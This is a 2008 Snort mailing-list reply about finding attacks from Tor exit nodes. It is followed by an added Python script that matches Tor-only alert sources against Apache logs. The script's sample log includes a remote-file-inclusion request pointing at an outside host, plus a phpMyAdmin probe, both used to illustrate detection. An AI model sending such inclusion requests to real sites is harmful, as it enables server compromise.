Snort mailing list archives

Re: [Emerging-Sigs] [Snort-sigs] Snort rules against traffic from Tor


From: Matt Jonkman <jonkman () jonkmans com>
Date: Thu, 18 Dec 2008 15:37:45 -0500

Frank Knobbe wrote:

> No no, I mean, reviewing the alerts generated by inbound TOR sigs and
> checking if there are SQL injection or other attacks that the regular
> didn't alert on

Ahh ya. That's a very good idea. What I've been doing out of curiosity
so far is grepping my apache logs for the IPs that trip tor exit nodes
but nothing else, and so far they're all very obvious bad stuff. Looking
for apps that don't exist, pass change forms, rfi's etc.

Will look closer and see where we can tune rules to make sure there are
hits where appropriate.

Good idea Frank!

Matt



-Frank





-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc
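
The triage described in this message, as an added example that is not part of the original post: find source IPs whose only Snort alerts came from Tor exit-node rules, then pull their requests from the Apache access log for review. It assumes Snort "fast" alert lines and Apache combined-format logs; the SIDs, addresses and log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample data (documentation address ranges), not real traffic.
ALERTS = """\
12/18-15:01:02.100000  [**] [1:9000001:1] EXAMPLE TOR exit node inbound [**] [Priority: 2] {TCP} 192.0.2.10:51234 -> 203.0.113.5:80
12/18-15:01:09.200000  [**] [1:9000001:1] EXAMPLE TOR exit node inbound [**] [Priority: 2] {TCP} 192.0.2.20:40100 -> 203.0.113.5:80
12/18-15:01:10.300000  [**] [1:9000002:1] EXAMPLE SQL injection attempt [**] [Priority: 1] {TCP} 192.0.2.20:40100 -> 203.0.113.5:80
12/18-15:02:30.400000  [**] [1:9000001:1] EXAMPLE TOR exit node inbound [**] [Priority: 2] {TCP} 192.0.2.30:33000 -> 203.0.113.5:80
""".splitlines()

ACCESS_LOG = """\
192.0.2.10 - - [18/Dec/2008:15:01:02 -0500] "GET /phpmyadmin/index.php HTTP/1.1" 404 209 "-" "-"
192.0.2.10 - - [18/Dec/2008:15:01:03 -0500] "GET /index.php?page=http://198.51.100.7/x.txt? HTTP/1.1" 200 512 "-" "-"
192.0.2.20 - - [18/Dec/2008:15:01:10 -0500] "GET /item.php?id=1 HTTP/1.1" 200 900 "-" "-"
198.51.100.99 - - [18/Dec/2008:15:01:30 -0500] "GET / HTTP/1.1" 200 1200 "-" "-"
""".splitlines()

# Captures the SID and the source IP from a fast-format alert line.
ALERT_RE = re.compile(r'\[\*\*\] \[\d+:(\d+):\d+\] .*\} ([\d.]+)(?::\d+)? -> ')
# Captures client IP, method, path and status from a combined-format log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
TOR_SIDS = {"9000001"}  # assumption: replace with the SIDs of your Tor exit-node rules

def tor_only_sources(alert_lines, tor_sids=TOR_SIDS):
    """Source IPs whose alerts all come from Tor exit-node rules."""
    sids_by_src = defaultdict(set)
    for line in alert_lines:
        m = ALERT_RE.search(line)
        if m:
            sids_by_src[m.group(2)].add(m.group(1))
    return {ip for ip, sids in sids_by_src.items() if sids <= tor_sids}

def requests_from(log_lines, ips):
    """Map each IP of interest to its (method, path, status) requests."""
    hits = {ip: [] for ip in ips}
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(1) in hits:
            hits[m.group(1)].append((m.group(2), m.group(3), int(m.group(4))))
    return hits

if __name__ == "__main__":
    for ip, reqs in sorted(requests_from(ACCESS_LOG, tor_only_sources(ALERTS)).items()):
        for method, path, status in reqs:
            print(ip, status, method, path)
```

Requests that show up here but look hostile are the candidates for tuning the regular rules, since no other signature fired on that source.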


